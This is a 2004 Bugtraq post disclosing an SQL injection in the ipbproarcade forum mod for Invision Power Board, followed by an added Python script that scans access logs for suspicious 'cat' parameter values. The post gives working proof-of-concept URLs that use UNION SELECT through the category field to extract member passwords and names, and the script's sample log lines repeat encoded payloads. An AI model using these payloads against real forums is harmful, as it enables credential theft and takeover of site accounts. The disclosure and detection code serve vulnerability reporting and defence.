Message-ID: <20041120200553.4085.qmail@www.securityfocus.com>
Date: 20 Nov 2004 20:05:53 -0000
From: axl daivy <axlownz@...il.com>
To: bugtraq@...urityfocus.com
Subject: IpbProArace 2.5.x SQL injection.

I have found an SQL injection in the popular ipbproarcade mod for IPB systems (1.x and 2.x).

The vuln exists in the "category" field. By using this field it is possible to inject any SQL query and compromise the entire forum system.

p.o.c for ipb 1.x:

http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

for ipb 2.x:

index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

Discovered by Axl.
Credit goes to HLL for helping me write the actual exploit.
Greetz to CereBrums and JonJon.

Cheers,
Axl
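For administrators checking whether a forum has already received such requests, this added example (not part of the original post) scans web-server access logs for Arcade requests whose `cat` value is not a plain integer. The log lines are constructed samples; treating valid category IDs as non-negative integers and matching `act` case-insensitively are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Nov/2004:20:01:10 +0000] "GET /index.php?act=Arcade&cat=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [20/Nov/2004:20:02:44 +0000] "GET /index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0%20FROM%20ibf_members/* HTTP/1.1" 200 9001',
    '203.0.113.7 - - [20/Nov/2004:20:03:02 +0000] "GET /index.php?act=Login&cat=abc HTTP/1.1" 200 800',
    '203.0.113.9 - - [20/Nov/2004:20:04:15 +0000] "GET /index.php?act=arcade&cat=2%2F**%2Funion HTTP/1.1" 200 700',
    '203.0.113.4 - - [20/Nov/2004:20:05:00 +0000] "GET /index.php?act=Arcade HTTP/1.1" 200 4000',
]

# Client address, then the request target inside the quoted request line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate category ID is a short run of digits.
CATEGORY_ID_RE = re.compile(r'\d{1,10}')


def suspicious_arcade_requests(lines):
    """Return (client, decoded cat value) for Arcade requests with a non-integer cat."""
    findings = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line we understand
        client, target = match.groups()
        # parse_qs percent-decodes values, so encoded payloads are compared decoded.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "arcade" not in [a.lower() for a in params.get("act", [])]:
            continue  # only the Arcade module is of interest here
        for value in params.get("cat", []):
            if not CATEGORY_ID_RE.fullmatch(value):
                findings.append((client, value))
    return findings


if __name__ == "__main__":
    for client, value in suspicious_arcade_requests(SAMPLE_LOG):
        print(f"{client}\tcat={value!r}")
```

Access logs normally record only the query string, so a `cat` value sent in a POST body would not show up in this scan.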